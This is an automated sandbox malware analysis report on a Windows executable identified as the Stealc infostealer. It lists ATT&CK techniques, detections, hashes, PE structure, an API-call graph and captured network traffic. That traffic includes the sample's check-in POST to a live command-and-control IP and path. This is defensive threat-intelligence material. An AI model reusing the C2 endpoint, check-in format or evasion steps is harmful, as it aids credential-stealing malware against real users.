                Persistence: 1 DLL Side-Loading | Boot or Logon Initialization Scripts | Logon Script (Windows) | Login Hook | Network Logon Script | RC Scripts | Startup Items | Scheduled Task/Job
                Privilege Escalation: 11 Process Injection | 1 DLL Side-Loading | Logon Script (Windows) | Login Hook | Network Logon Script | RC Scripts | Startup Items | Scheduled Task/Job
                Defense Evasion: 1 Masquerading | 33 Virtualization/Sandbox Evasion | 11 Disable or Modify Tools | 11 Process Injection | 1 Deobfuscate/Decode Files or Information | 3 Obfuscated Files or Information | 12 Software Packing | 1 DLL Side-Loading
                Credential Access: OS Credential Dumping | LSASS Memory | Security Account Manager | NTDS | LSA Secrets | Cached Domain Credentials | DCSync | Proc Filesystem
                Discovery: 2 System Time Discovery | 641 Security Software Discovery | 33 Virtualization/Sandbox Evasion | 13 Process Discovery | 1 Account Discovery | 1 System Owner/User Discovery | 1 File and Directory Discovery | 324 System Information Discovery
                Lateral Movement: Remote Services | Remote Desktop Protocol | SMB/Windows Admin Shares | Distributed Component Object Model | SSH | VNC | Windows Remote Management | Cloud Services
                Collection: 1 Archive Collected Data | Data from Removable Media | Data from Network Shared Drive | Input Capture | Keylogging | GUI Input Capture | Web Portal Capture | Credential API Hooking
                Command and Control: 2 Encrypted Channel | 2 Ingress Tool Transfer | 2 Non-Application Layer Protocol | 12 Application Layer Protocol | Fallback Channels | Multiband Communication | Commonly Used Port | Application Layer Protocol
                Exfiltration: Exfiltration Over Other Network Medium | Exfiltration Over Bluetooth | Automated Exfiltration | Traffic Duplication | Scheduled Transfer | Data Transfer Size Limits | Exfiltration Over C2 Channel | Exfiltration Over Alternative Protocol
                Impact: Abuse Accessibility Features | Network Denial of Service | Data Encrypted for Impact | Data Destruction | Data Encrypted for Impact | Service Stop | Inhibit System Recovery | Defacement
                Source | Detection | Scanner | Label
                file.exe | 42% | Virustotal |
                file.exe | 100% | Avira | TR/Crypt.TPM.Gen
                file.exe | 100% | Joe Sandbox ML |
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                Source | Detection | Scanner | Label
                http://185.215.113.37/ | 100% | URL Reputation | malware
                http://185.215.113.37/ | 100% | URL Reputation | malware
                http://185.215.113.37 | 100% | URL Reputation | malware
                http://185.215.113.37 | 100% | URL Reputation | malware
                http://185.215.113.37/e2b1563c6670f193.php | 100% | URL Reputation | malware
                http://185.215.113.37/e2b1563c6670f193.php | 100% | URL Reputation | malware
                http://185.215.113.37/E | 17% | Virustotal |
                http://185.215.113.37/ws | 17% | Virustotal |
                http://185.215.113.37/e2b1563c6670f193.phpy | 17% | Virustotal |
                http://185.215.113.37/2 | 17% | Virustotal |
                No contacted domains info
                Name | Malicious | Antivirus Detection | Reputation
                http://185.215.113.37/ | true | URL Reputation: malware; URL Reputation: malware | unknown
                http://185.215.113.37/e2b1563c6670f193.php | true | URL Reputation: malware; URL Reputation: malware | unknown
                Name | Source | Malicious | Antivirus Detection | Reputation
                http://185.215.113.37/E | file.exe, 00000000.00000002.2066181737.000000000100E000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
                http://185.215.113.37 | file.exe, 00000000.00000002.2066181737.000000000100E000.00000004.00000020.00020000.00000000.sdmp | true | URL Reputation: malware; URL Reputation: malware | unknown
                http://185.215.113.37/2 | file.exe, 00000000.00000002.2066181737.0000000001068000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
                http://185.215.113.37/ws | file.exe, 00000000.00000002.2066181737.0000000001068000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
                http://185.215.113.37/e2b1563c6670f193.phpy | file.exe, 00000000.00000002.2066181737.0000000001068000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
                IP | Domain | Country | ASN | ASN Name | Malicious
                185.215.113.37 | unknown | Portugal | 206894 | WHOLESALECONNECTIONSNL | true
                Joe Sandbox version: 41.0.0 Charoite
                Analysis ID: 1523176
                Start date and time: 2024-10-01 08:19:07 +02:00
                Joe Sandbox product: CloudBasic
                Overall analysis duration: 0h 2m 38s
                Hypervisor based Inspection enabled: false
                Report type: full
                Cookbook file name: default.jbs
                Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                Number of new started processes analysed: 2
                Number of new started drivers analysed: 0
                Number of existing processes analysed: 0
                Number of existing drivers analysed: 0
                Number of injected processes analysed: 0
                Technologies:
                • HCA enabled
                • EGA enabled
                • AMSI enabled
                Analysis Mode: default
                Analysis stop reason: Timeout
                Sample name: file.exe
                Detection: MAL
                Classification: mal100.troj.evad.winEXE@1/0@0/1
                EGA Information:
                • Successful, ratio: 100%
                HCA Information:
                • Successful, ratio: 81%
                • Number of executed functions: 19
                • Number of non-executed functions: 86
                Cookbook Comments:
                • Found application associated with file extension: .exe
                • Stop behavior analysis, all processes terminated
                • Exclude process from analysis (whitelisted): dllhost.exe
                • Report size getting too big, too many NtQueryValueKey calls found.
                No simulations
                Match: 185.215.113.37
                Associated Sample Name / URL   Detection   Threat Name     Context
                file.exe                       malicious   Stealc          185.215.113.37/e2b1563c6670f193.php
                file.exe                       malicious   Stealc, Vidar   185.215.113.37/e2b1563c6670f193.php
                file.exe                       malicious   Stealc          185.215.113.37/e2b1563c6670f193.php
                file.exe                       malicious   Stealc, Vidar   185.215.113.37/e2b1563c6670f193.php
                file.exe                       malicious   Stealc, Vidar   185.215.113.37/e2b1563c6670f193.php
                file.exe                       malicious   Stealc          185.215.113.37/e2b1563c6670f193.php
                file.exe                       malicious   Stealc          185.215.113.37/e2b1563c6670f193.php
                file.exe                       malicious   Stealc, Vidar   185.215.113.37/e2b1563c6670f193.php
                file.exe                       malicious   Stealc          185.215.113.37/e2b1563c6670f193.php
                file.exe                       malicious   Stealc          185.215.113.37/e2b1563c6670f193.php
                No context
                Match: WHOLESALECONNECTIONSNL
                Associated Sample Name / URL   Detection   Threat Name     Context
                file.exe                       malicious   Stealc          185.215.113.37
                file.exe                       malicious   Stealc, Vidar   185.215.113.37
                file.exe                       malicious   Stealc          185.215.113.37
                file.exe                       malicious   Stealc, Vidar   185.215.113.37
                file.exe                       malicious   Stealc, Vidar   185.215.113.37
                file.exe                       malicious   Stealc          185.215.113.37
                file.exe                       malicious   Stealc          185.215.113.37
                file.exe                       malicious   Stealc, Vidar   185.215.113.37
                file.exe                       malicious   Stealc          185.215.113.37
                file.exe                       malicious   Stealc          185.215.113.37
                No context
                No context
                No created / dropped files found
                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                Entropy (8bit):7.9476080917684975
                TrID:
                • Win32 Executable (generic) a (10002005/4) 99.96%
                • Generic Win/DOS Executable (2004/3) 0.02%
                • DOS Executable Generic (2002/1) 0.02%
                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                File name:file.exe
                File size:1'858'048 bytes
                MD5:564e5677e7262707df20c3ea7f110513
                SHA1:be8c6288b0baf0bd470e6ab8174e85c03470e0f5
                SHA256:8ed1f28fe0588fd7e27b22329ba5c2cbed9bf6aeec4e2e4dbe2cf751f2f1d629
                SHA512:32512119af4d302374cb3abf690ca20ddeaf99d542e91840b92f3ec3d04bb201e62cc785c2464db67011d010ea5ea0de08b6ae9d176c69d5ddf6f608123ed81c
                SSDEEP:49152:O5J2ApiaFNyPOqc9Tw0hUiunNiAfuetwA3tsPdDxnz7:O5JnXNym19k0hUiu8Ameth3G1Dh
                TLSH:0B85331A1C599D3CEA9F667D235B53EB60B5FD4E24E800B70FA61476E03A3423B3254E
                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...J..f...........
                Icon Hash:00928e8e8686b000
                Entrypoint:0xaa5000
                Entrypoint Section:.taggant
                Digitally signed:false
                Imagebase:0x400000
                Subsystem:windows gui
                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                Time Stamp:0x66F99A4A [Sun Sep 29 18:19:54 2024 UTC]
                TLS Callbacks:
                CLR (.Net) Version:
                OS Version Major:5
                OS Version Minor:1
                File Version Major:5
                File Version Minor:1
                Subsystem Version Major:5
                Subsystem Version Minor:1
                Import Hash:2eabe9054cad5152567f0699947a2c5b
                Instruction
                jmp 00007F5B4CB29F9Ah
                pabsb mm0, qword ptr [eax]
                add byte ptr [eax], al
                add byte ptr [eax], al
                jmp 00007F5B4CB2BF95h
                add byte ptr [0000000Ah], al
                add byte ptr [eax], al
                add byte ptr [eax], dh
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [edx], cl
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [ecx], cl
                add byte ptr [eax], 00000000h
                add byte ptr [eax], al
                add byte ptr [eax], al
                adc byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add ecx, dword ptr [edx]
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                xor byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], 00000000h
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], cl
                add byte ptr [eax], 00000000h
                add byte ptr [eax], al
                add byte ptr [eax], al
                adc byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add ecx, dword ptr [edx]
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                xor byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], cl
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                mov cl, 80h
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                xor byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add al, 00h
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                and al, 00h
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add dword ptr [eax+00000000h], eax
                add byte ptr [eax], al
                Programming Language:
                • [C++] VS2010 build 30319
                • [ASM] VS2010 build 30319
                • [ C ] VS2010 build 30319
                • [ C ] VS2008 SP1 build 30729
                • [IMP] VS2008 SP1 build 30729
                • [LNK] VS2010 build 30319
                Name                                   Virtual Address   Virtual Size   Is in Section
                IMAGE_DIRECTORY_ENTRY_EXPORT           0x0               0x0
                IMAGE_DIRECTORY_ENTRY_IMPORT           0x25d050          0x64           .idata
                IMAGE_DIRECTORY_ENTRY_RESOURCE         0x0               0x0
                IMAGE_DIRECTORY_ENTRY_EXCEPTION        0x0               0x0
                IMAGE_DIRECTORY_ENTRY_SECURITY         0x0               0x0
                IMAGE_DIRECTORY_ENTRY_BASERELOC        0x25d1f8          0x8            .idata
                IMAGE_DIRECTORY_ENTRY_DEBUG            0x0               0x0
                IMAGE_DIRECTORY_ENTRY_COPYRIGHT        0x0               0x0
                IMAGE_DIRECTORY_ENTRY_GLOBALPTR        0x0               0x0
                IMAGE_DIRECTORY_ENTRY_TLS              0x0               0x0
                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG      0x0               0x0
                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT     0x0               0x0
                IMAGE_DIRECTORY_ENTRY_IAT              0x0               0x0
                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT     0x0               0x0
                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR   0x0               0x0
                IMAGE_DIRECTORY_ENTRY_RESERVED         0x0               0x0
                Name        Virtual Address   Virtual Size   Raw Size   MD5                                Xored PE   ZLIB Complexity      File Type              Entropy              Characteristics
                (unnamed)   0x1000            0x25b000       0x22800    b1bcb43454d2b3d21b9b457ab2abc631   unknown    unknown              unknown                unknown              IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                .rsrc       0x25c000          0x1000         0x0        d41d8cd98f00b204e9800998ecf8427e   False      0                    empty                  0.0                  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                .idata      0x25d000          0x1000         0x200      c60c4959cc8d384ac402730cc6842bb0   False      0.1328125            data                   0.9064079259880791   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                (unnamed)   0x25e000          0x2a6000       0x200      643e7c0bd22689a496ad5e5ca1161f8b   unknown    unknown              unknown                unknown              IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                xlnfjtas    0x504000          0x1a0000       0x19f800   b5e25e1bc4819a19089f9d44b4dfbc55   False      0.994943263011432    data                   7.954276086869488    IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                vyivhryn    0x6a4000          0x1000         0x400      650ee8548618859a8d4792c23bbe8fdd   False      0.7841796875         data                   6.0609524178209915   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                .taggant    0x6a5000          0x3000         0x2200     68fc64b19066323e0e5e1cf865dacd6a   False      0.1032858455882353   DOS executable (COM)   1.2308457568560487   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                DLL            Import
                kernel32.dll   lstrcpy
                Timestamp                         SID       Signature                                         Severity   Source IP     Source Port   Dest IP          Dest Port   Protocol
                2024-10-01T08:19:58.612159+0200   2044243   ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in   1          192.168.2.5   49704         185.215.113.37   80          TCP
                Timestamp                             Source Port   Dest Port   Source IP        Dest IP
                Oct 1, 2024 08:19:57.505016088 CEST   49704         80          192.168.2.5      185.215.113.37
                Oct 1, 2024 08:19:57.680705070 CEST   80            49704       185.215.113.37   192.168.2.5
                Oct 1, 2024 08:19:57.680803061 CEST   49704         80          192.168.2.5      185.215.113.37
                Oct 1, 2024 08:19:57.681005955 CEST   49704         80          192.168.2.5      185.215.113.37
                Oct 1, 2024 08:19:57.686271906 CEST   80            49704       185.215.113.37   192.168.2.5
                Oct 1, 2024 08:19:58.381277084 CEST   80            49704       185.215.113.37   192.168.2.5
                Oct 1, 2024 08:19:58.381346941 CEST   49704         80          192.168.2.5      185.215.113.37
                Oct 1, 2024 08:19:58.384572983 CEST   49704         80          192.168.2.5      185.215.113.37
                Oct 1, 2024 08:19:58.389328003 CEST   80            49704       185.215.113.37   192.168.2.5
                Oct 1, 2024 08:19:58.612097025 CEST   80            49704       185.215.113.37   192.168.2.5
                Oct 1, 2024 08:19:58.612159014 CEST   49704         80          192.168.2.5      185.215.113.37
                Oct 1, 2024 08:20:02.679986000 CEST   49704         80          192.168.2.5      185.215.113.37
                • 185.215.113.37
                Session ID   Source IP     Source Port   Destination IP   Destination Port   PID    Process
                0            192.168.2.5   49704         185.215.113.37   80                 1520   C:\Users\user\Desktop\file.exe
                Timestamp                             Bytes transferred   Direction   Data
                Oct 1, 2024 08:19:57.681005955 CEST   89                  OUT         GET / HTTP/1.1
                Host: 185.215.113.37
                Connection: Keep-Alive
                Cache-Control: no-cache
                Oct 1, 2024 08:19:58.381277084 CEST   203                 IN          HTTP/1.1 200 OK
                Date: Tue, 01 Oct 2024 06:19:58 GMT
                Server: Apache/2.4.52 (Ubuntu)
                Content-Length: 0
                Keep-Alive: timeout=5, max=100
                Connection: Keep-Alive
                Content-Type: text/html; charset=UTF-8
                Oct 1, 2024 08:19:58.384572983 CEST   412                 OUT         POST /e2b1563c6670f193.php HTTP/1.1
                Content-Type: multipart/form-data; boundary=----AAKKKEBFCGDBGDGCFHCB
                Host: 185.215.113.37
                Content-Length: 211
                Connection: Keep-Alive
                Cache-Control: no-cache
                Data Raw: 2d 2d 2d 2d 2d 2d 41 41 4b 4b 4b 45 42 46 43 47 44 42 47 44 47 43 46 48 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 31 41 31 35 35 39 32 32 44 46 35 31 36 36 30 34 39 33 34 38 35 0d 0a 2d 2d 2d 2d 2d 2d 41 41 4b 4b 4b 45 42 46 43 47 44 42 47 44 47 43 46 48 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 41 41 4b 4b 4b 45 42 46 43 47 44 42 47 44 47 43 46 48 43 42 2d 2d 0d 0a
                Data Ascii: ------AAKKKEBFCGDBGDGCFHCBContent-Disposition: form-data; name="hwid"31A155922DF51660493485------AAKKKEBFCGDBGDGCFHCBContent-Disposition: form-data; name="build"doma------AAKKKEBFCGDBGDGCFHCB--
                Oct 1, 2024 08:19:58.612097025 CEST   210                 IN          HTTP/1.1 200 OK
                Date: Tue, 01 Oct 2024 06:19:58 GMT
                Server: Apache/2.4.52 (Ubuntu)
                Content-Length: 8
                Keep-Alive: timeout=5, max=99
                Connection: Keep-Alive
                Content-Type: text/html; charset=UTF-8
                Data Raw: 59 6d 78 76 59 32 73 3d
                Data Ascii: YmxvY2s=



                Target ID:0
                Start time:02:19:53
                Start date:01/10/2024
                Path:C:\Users\user\Desktop\file.exe
                Wow64 process (32bit):true
                Commandline:"C:\Users\user\Desktop\file.exe"
                Imagebase:0x130000
                File size:1'858'048 bytes
                MD5 hash:564E5677E7262707DF20C3EA7F110513
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2066181737.000000000100E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.2024949095.0000000004E60000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                Reputation:low
                Has exited:true


                  Execution Graph

                  Execution Coverage:7.9%
                  Dynamic/Decrypted Code Coverage:0%
                  Signature Coverage:9.7%
                  Total number of Nodes:2000
                  Total number of Limit Nodes:24
                  execution_graph 13438 1469f0 13483 132260 13438->13483 13462 146a64 13463 14a9b0 4 API calls 13462->13463 13464 146a6b 13463->13464 13465 14a9b0 4 API calls 13464->13465 13466 146a72 13465->13466 13467 14a9b0 4 API calls 13466->13467 13468 146a79 13467->13468 13469 14a9b0 4 API calls 13468->13469 13470 146a80 13469->13470 13635 14a8a0 13470->13635 13472 146b0c 13639 146920 GetSystemTime 13472->13639 13473 146a89 13473->13472 13475 146ac2 OpenEventA 13473->13475 13477 146af5 CloseHandle Sleep 13475->13477 13478 146ad9 13475->13478 13481 146b0a 13477->13481 13482 146ae1 CreateEventA 13478->13482 13481->13473 13482->13472 13836 1345c0 13483->13836 13485 132274 13486 1345c0 2 API calls 13485->13486 13487 13228d 13486->13487 13488 1345c0 2 API calls 13487->13488 13489 1322a6 13488->13489 13490 1345c0 2 API calls 13489->13490 13491 1322bf 13490->13491 13492 1345c0 2 API calls 13491->13492 13493 1322d8 13492->13493 13494 1345c0 2 API calls 13493->13494 13495 1322f1 13494->13495 13496 1345c0 2 API calls 13495->13496 13497 13230a 13496->13497 13498 1345c0 2 API calls 13497->13498 13499 132323 13498->13499 13500 1345c0 2 API calls 13499->13500 13501 13233c 13500->13501 13502 1345c0 2 API calls 13501->13502 13503 132355 13502->13503 13504 1345c0 2 API calls 13503->13504 13505 13236e 13504->13505 13506 1345c0 2 API calls 13505->13506 13507 132387 13506->13507 13508 1345c0 2 API calls 13507->13508 13509 1323a0 13508->13509 13510 1345c0 2 API calls 13509->13510 13511 1323b9 13510->13511 13512 1345c0 2 API calls 13511->13512 13513 1323d2 13512->13513 13514 1345c0 2 API calls 13513->13514 13515 1323eb 13514->13515 13516 1345c0 2 API calls 13515->13516 13517 132404 13516->13517 13518 1345c0 2 API calls 13517->13518 13519 13241d 13518->13519 13520 1345c0 2 API calls 13519->13520 13521 132436 13520->13521 13522 1345c0 2 API calls 13521->13522 13523 13244f 13522->13523 13524 1345c0 2 API calls 13523->13524 13525 132468 13524->13525 13526 1345c0 2 API calls 
13525->13526 13527 132481 13526->13527 13528 1345c0 2 API calls 13527->13528 13529 13249a 13528->13529 13530 1345c0 2 API calls 13529->13530 13531 1324b3 13530->13531 13532 1345c0 2 API calls 13531->13532 13533 1324cc 13532->13533 13534 1345c0 2 API calls 13533->13534 13535 1324e5 13534->13535 13536 1345c0 2 API calls 13535->13536 13537 1324fe 13536->13537 13538 1345c0 2 API calls 13537->13538 13539 132517 13538->13539 13540 1345c0 2 API calls 13539->13540 13541 132530 13540->13541 13542 1345c0 2 API calls 13541->13542 13543 132549 13542->13543 13544 1345c0 2 API calls 13543->13544 13545 132562 13544->13545 13546 1345c0 2 API calls 13545->13546 13547 13257b 13546->13547 13548 1345c0 2 API calls 13547->13548 13549 132594 13548->13549 13550 1345c0 2 API calls 13549->13550 13551 1325ad 13550->13551 13552 1345c0 2 API calls 13551->13552 13553 1325c6 13552->13553 13554 1345c0 2 API calls 13553->13554 13555 1325df 13554->13555 13556 1345c0 2 API calls 13555->13556 13557 1325f8 13556->13557 13558 1345c0 2 API calls 13557->13558 13559 132611 13558->13559 13560 1345c0 2 API calls 13559->13560 13561 13262a 13560->13561 13562 1345c0 2 API calls 13561->13562 13563 132643 13562->13563 13564 1345c0 2 API calls 13563->13564 13565 13265c 13564->13565 13566 1345c0 2 API calls 13565->13566 13567 132675 13566->13567 13568 1345c0 2 API calls 13567->13568 13569 13268e 13568->13569 13570 149860 13569->13570 13841 149750 GetPEB 13570->13841 13572 149868 13573 149a93 LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 13572->13573 13574 14987a 13572->13574 13575 149af4 GetProcAddress 13573->13575 13576 149b0d 13573->13576 13577 14988c 21 API calls 13574->13577 13575->13576 13578 149b46 13576->13578 13579 149b16 GetProcAddress GetProcAddress 13576->13579 13577->13573 13580 149b4f GetProcAddress 13578->13580 13581 149b68 13578->13581 13579->13578 13580->13581 13582 149b71 GetProcAddress 13581->13582 13583 149b89 13581->13583 13582->13583 13584 146a00 13583->13584 13585 149b92 
GetProcAddress GetProcAddress 13583->13585 13586 14a740 13584->13586 13585->13584 13587 14a750 13586->13587 13588 146a0d 13587->13588 13589 14a77e lstrcpy 13587->13589 13590 1311d0 13588->13590 13589->13588 13591 1311e8 13590->13591 13592 131217 13591->13592 13593 13120f ExitProcess 13591->13593 13594 131160 GetSystemInfo 13592->13594 13595 131184 13594->13595 13596 13117c ExitProcess 13594->13596 13597 131110 GetCurrentProcess VirtualAllocExNuma 13595->13597 13598 131141 ExitProcess 13597->13598 13599 131149 13597->13599 13842 1310a0 VirtualAlloc 13599->13842 13602 131220 13846 1489b0 13602->13846 13605 131249 __aulldiv 13606 13129a 13605->13606 13607 131292 ExitProcess 13605->13607 13608 146770 GetUserDefaultLangID 13606->13608 13609 146792 13608->13609 13610 1467d3 13608->13610 13609->13610 13611 1467b7 ExitProcess 13609->13611 13612 1467c1 ExitProcess 13609->13612 13613 1467a3 ExitProcess 13609->13613 13614 1467ad ExitProcess 13609->13614 13615 1467cb ExitProcess 13609->13615 13616 131190 13610->13616 13617 1478e0 3 API calls 13616->13617 13618 13119e 13617->13618 13619 1311cc 13618->13619 13620 147850 3 API calls 13618->13620 13623 147850 GetProcessHeap RtlAllocateHeap GetUserNameA 13619->13623 13621 1311b7 13620->13621 13621->13619 13622 1311c4 ExitProcess 13621->13622 13624 146a30 13623->13624 13625 1478e0 GetProcessHeap RtlAllocateHeap GetComputerNameA 13624->13625 13626 146a43 13625->13626 13627 14a9b0 13626->13627 13848 14a710 13627->13848 13629 14a9c1 lstrlen 13630 14a9e0 13629->13630 13631 14aa18 13630->13631 13633 14a9fa lstrcpy lstrcat 13630->13633 13849 14a7a0 13631->13849 13633->13631 13634 14aa24 13634->13462 13636 14a8bb 13635->13636 13637 14a90b 13636->13637 13638 14a8f9 lstrcpy 13636->13638 13637->13473 13638->13637 13853 146820 13639->13853 13641 14698e 13642 146998 sscanf 13641->13642 13882 14a800 13642->13882 13644 1469aa SystemTimeToFileTime SystemTimeToFileTime 13645 1469e0 13644->13645 13646 1469ce 13644->13646 13648 145b10 13645->13648 
13646->13645 13647 1469d8 ExitProcess 13646->13647 13649 145b1d 13648->13649 13650 14a740 lstrcpy 13649->13650 13651 145b2e 13650->13651 13884 14a820 lstrlen 13651->13884 13654 14a820 2 API calls 13655 145b64 13654->13655 13656 14a820 2 API calls 13655->13656 13657 145b74 13656->13657 13888 146430 13657->13888 13660 14a820 2 API calls 13661 145b93 13660->13661 13662 14a820 2 API calls 13661->13662 13663 145ba0 13662->13663 13664 14a820 2 API calls 13663->13664 13665 145bad 13664->13665 13666 14a820 2 API calls 13665->13666 13667 145bf9 13666->13667 13897 1326a0 13667->13897 13675 145cc3 13676 146430 lstrcpy 13675->13676 13677 145cd5 13676->13677 13678 14a7a0 lstrcpy 13677->13678 13679 145cf2 13678->13679 13680 14a9b0 4 API calls 13679->13680 13681 145d0a 13680->13681 13682 14a8a0 lstrcpy 13681->13682 13683 145d16 13682->13683 13684 14a9b0 4 API calls 13683->13684 13685 145d3a 13684->13685 13686 14a8a0 lstrcpy 13685->13686 13687 145d46 13686->13687 13688 14a9b0 4 API calls 13687->13688 13689 145d6a 13688->13689 13690 14a8a0 lstrcpy 13689->13690 13691 145d76 13690->13691 13692 14a740 lstrcpy 13691->13692 13693 145d9e 13692->13693 14623 147500 GetWindowsDirectoryA 13693->14623 13696 14a7a0 lstrcpy 13697 145db8 13696->13697 14633 134880 13697->14633 13699 145dbe 14778 1417a0 13699->14778 13701 145dc6 13702 14a740 lstrcpy 13701->13702 13703 145de9 13702->13703 13704 131590 lstrcpy 13703->13704 13705 145dfd 13704->13705 14794 135960 13705->14794 13707 145e03 14938 141050 13707->14938 13709 145e0e 13710 14a740 lstrcpy 13709->13710 13711 145e32 13710->13711 13712 131590 lstrcpy 13711->13712 13713 145e46 13712->13713 13714 135960 34 API calls 13713->13714 13715 145e4c 13714->13715 14942 140d90 13715->14942 13717 145e57 13718 14a740 lstrcpy 13717->13718 13719 145e79 13718->13719 13720 131590 lstrcpy 13719->13720 13721 145e8d 13720->13721 13722 135960 34 API calls 13721->13722 13723 145e93 13722->13723 14949 140f40 13723->14949 13725 145e9e 13726 131590 lstrcpy 13725->13726 
13727 145eb5 13726->13727 14954 141a10 13727->14954 13729 145eba 13730 14a740 lstrcpy 13729->13730 13731 145ed6 13730->13731 15298 134fb0 GetProcessHeap RtlAllocateHeap InternetOpenA 13731->15298 13733 145edb 13734 131590 lstrcpy 13733->13734 13735 145f5b 13734->13735 15305 140740 13735->15305 13737 145f60 13738 14a740 lstrcpy 13737->13738 13739 145f86 13738->13739 13740 131590 lstrcpy 13739->13740 13741 145f9a 13740->13741 13742 135960 34 API calls 13741->13742 13837 1345d1 RtlAllocateHeap 13836->13837 13840 134621 VirtualProtect 13837->13840 13840->13485 13841->13572 13844 1310c2 codecvt 13842->13844 13843 1310fd 13843->13602 13844->13843 13845 1310e2 VirtualFree 13844->13845 13845->13843 13847 131233 GlobalMemoryStatusEx 13846->13847 13847->13605 13848->13629 13850 14a7c2 13849->13850 13851 14a7ec 13850->13851 13852 14a7da lstrcpy 13850->13852 13851->13634 13852->13851 13854 14a740 lstrcpy 13853->13854 13855 146833 13854->13855 13856 14a9b0 4 API calls 13855->13856 13857 146845 13856->13857 13858 14a8a0 lstrcpy 13857->13858 13859 14684e 13858->13859 13860 14a9b0 4 API calls 13859->13860 13861 146867 13860->13861 13862 14a8a0 lstrcpy 13861->13862 13863 146870 13862->13863 13864 14a9b0 4 API calls 13863->13864 13865 14688a 13864->13865 13866 14a8a0 lstrcpy 13865->13866 13867 146893 13866->13867 13868 14a9b0 4 API calls 13867->13868 13869 1468ac 13868->13869 13870 14a8a0 lstrcpy 13869->13870 13871 1468b5 13870->13871 13872 14a9b0 4 API calls 13871->13872 13873 1468cf 13872->13873 13874 14a8a0 lstrcpy 13873->13874 13875 1468d8 13874->13875 13876 14a9b0 4 API calls 13875->13876 13877 1468f3 13876->13877 13878 14a8a0 lstrcpy 13877->13878 13879 1468fc 13878->13879 13880 14a7a0 lstrcpy 